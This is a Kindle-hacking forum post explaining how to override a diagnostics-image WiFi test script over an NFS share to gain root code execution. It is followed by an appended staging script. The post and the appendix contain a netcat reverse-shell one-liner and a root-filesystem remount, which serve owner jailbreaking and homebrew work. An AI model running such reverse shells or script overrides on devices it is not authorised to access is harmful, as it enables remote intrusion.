I've found a method to execute an arbitrary shell script using the diagnostics image. This is kind of useless for the Kindle 4 non-touch since we already have an easier method, but it may enable access to the Kindle Touch.
The instructions are a bit complex. They assume that you know how to use USB Ethernet and set up an NFS share.
1. Create a USBnet.xml file in your Kindle's root directory (over USB). This file will describe an NFS mountpoint. We will use that functionality to override a script which can be executed by the WiFi test item in the diagnostics image. The content of the XML file should look like:
<?xml version="1.0" standalone="no" ?>
<!-- USB Net info -->
<USB_NetInfo ipNumber="15" device_NFS_path="/opt/factory/tools/atheros/art_rel/art/bin/host/support/platformscripts" host_NFS_path="/path/to/nfs/share/on/host/" />
2. Set up an NFS share on your computer as /path/to/nfs/share/on/host/ (or whatever you want to call it).
3. Reboot your Kindle in diagnostics mode.
4. Enable USBnet (see previous post #202 for instructions). If your XML file was properly read, you should see something like:
ipAddress : 192.168.15.244
netMask : 255.255.255.0
hostAddr : EE2900000015
host_NFS : /path/to/nfs/share/on/host/
5. Configure the network interface on your computer to use 192.168.15.201. This is the IP address the Kindle will connect to in order to mount the NFS share.
6. In the same menu section as USBnet, mount the NFS share.
7. This is where things become interesting. On the NFS share, create an executable script called plat_YOSHI-SDIO.sh. Example content could be:
#!/bin/sh
# Remount the root filesystem read-write so files can be written to it
mount -o remount,rw /
# Leave a marker in three locations to confirm the script ran (as root)
echo "hey" > /hello.msg
echo "here" > /var/local/hello.msg
echo "ho" > /mnt/us/hello.msg
8. In the Misc individual diagnostics > Wifi Test menu, execute the WIFI ON item. This will run the above script. Note that the Kindle might freeze afterwards, but it's OK, the script was run.
9. Reboot and connect as a USB mass storage device. You should now have a hello.msg file.
This hasn't been tested on a Touch yet, but I've had confirmation that the script we're trying to override exists, so it seems like a pretty safe bet.
Of course my example script is pretty useless. But something like the following script should get you a working sshd in the diagnostics image if you can get your hands on a Kindle 4 non-touch dropbearmulti binary:
#!/bin/sh
mount -o remount,rw /
# Install the multi-call binary from the USB storage partition and link the applets
cp /mnt/us/dropbearmulti /usr/local/bin/
ln -sfn /usr/local/bin/dropbearmulti /usr/local/sbin/dropbear
ln -sfn /usr/local/bin/dropbearmulti /usr/local/sbin/dropbearkey
# The host key directory may not exist in the diagnostics image
mkdir -p /etc/dropbear
# dropbearkey was linked into /usr/local/sbin above, so call it from there
/usr/local/sbin/dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key
# Start the daemon (default port 22, default host key path); without this the binary is only installed
/usr/local/sbin/dropbear
You could also try setting up a reverse shell using the provided binaries only.
On the host computer run:
In the script:
# Named pipe (FIFO) created in the script's current working directory
mknod in p
# nc reads sh's output from the FIFO and sends it to the host; whatever the
# host sends is piped into sh, whose output (and errors) goes back into the FIFO
nc 192.168.15.201 1234 0< in | sh > in 2>&1
Once the script is run, you should be able to run commands from the host as if in a normal shell (albeit without a prompt). For example, running "find /" should output the full file listing.
I'd love to have feedback from Touch owners.
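As an added example that is not part of the original post (and not the author's code): a POSIX shell script that stages the two files the procedure above needs (USBnet.xml in the Kindle's USB root, and the replacement plat_YOSHI-SDIO.sh on the NFS share, carrying the reverse shell) and prints the host-side listener command that the post does not show. It keeps 192.168.15.201:1234 and the device_NFS_path from the post. Assumptions: the Kindle's USB storage and the share directory are passed in as local paths, and the FIFO is created at /tmp/rs (an absolute path chosen here) rather than in the current directory, because the working directory of the diagnostics tool is unknown and / may still be read-only when the script starts.

```shell
#!/bin/sh
# Added example (not from the original post): stage the files the
# diagnostics-image script override needs, then print the host listener
# command. Assumes local paths for the Kindle USB root and the NFS share
# directory; keeps the host address and port from the post.
set -eu

HOST_IP="192.168.15.201"   # host address on the USBnet link (from the post)
PORT="1234"                # listener port (from the post)
DEVICE_NFS_PATH="/opt/factory/tools/atheros/art_rel/art/bin/host/support/platformscripts"

# write_usbnet_xml KINDLE_ROOT HOST_NFS_PATH
# Writes USBnet.xml so the Kindle mounts HOST_NFS_PATH over the platform
# scripts directory. Prints the path of the file written.
write_usbnet_xml() {
    kindle_root=$1
    host_nfs_path=$2
    mkdir -p "$kindle_root"
    cat > "$kindle_root/USBnet.xml" <<EOF
<?xml version="1.0" standalone="no" ?>
<!-- USB Net info -->
<USB_NetInfo ipNumber="15" device_NFS_path="$DEVICE_NFS_PATH" host_NFS_path="$host_nfs_path" />
EOF
    printf '%s\n' "$kindle_root/USBnet.xml"
}

# write_payload SHARE_DIR
# Writes the replacement plat_YOSHI-SDIO.sh: remount / read-write, then a
# FIFO-backed reverse shell to HOST_IP:PORT. Prints the path written.
write_payload() {
    share_dir=$1
    mkdir -p "$share_dir"
    payload="$share_dir/plat_YOSHI-SDIO.sh"
    cat > "$payload" <<EOF
#!/bin/sh
# Replacement platform script: executed by the WIFI ON diagnostics item.
mount -o remount,rw /
# FIFO at an absolute path (assumption: /tmp is writable) so the script
# does not depend on the tool's current working directory.
rm -f /tmp/rs; mknod /tmp/rs p
# nc reads sh's output from the FIFO and sends it to the host; the host's
# input is piped into sh, whose output and errors go back into the FIFO.
nc $HOST_IP $PORT 0< /tmp/rs | sh > /tmp/rs 2>&1
EOF
    chmod 0755 "$payload"
    printf '%s\n' "$payload"
}

# listener_cmd: the command to run on the host before pressing WIFI ON.
# Traditional netcat takes "-l -p PORT"; BSD netcat and ncat take "-l PORT".
listener_cmd() {
    printf 'nc -l -p %s   # or: nc -l %s (BSD netcat / ncat)\n' "$PORT" "$PORT"
}

# stage KINDLE_ROOT SHARE_DIR HOST_NFS_PATH
# HOST_NFS_PATH is the path as exported by the host; it usually equals
# SHARE_DIR, but is kept separate in case the share is staged elsewhere.
stage() {
    write_usbnet_xml "$1" "$3"
    write_payload "$2"
    printf 'Host: export %s over NFS, then run: %s\n' "$3" "$(listener_cmd)"
}

# Usage: sh stage_kindle_diag.sh /media/Kindle /srv/kindle_share /srv/kindle_share
if [ "$#" -ge 3 ]; then
    stage "$1" "$2" "$3"
fi
```

Run it with the Kindle mounted as USB mass storage and the share directory already exported, then follow steps 3 to 8 of the post; start the printed listener before executing WIFI ON, since the Kindle connects out to the host and the session is lost if nothing is listening.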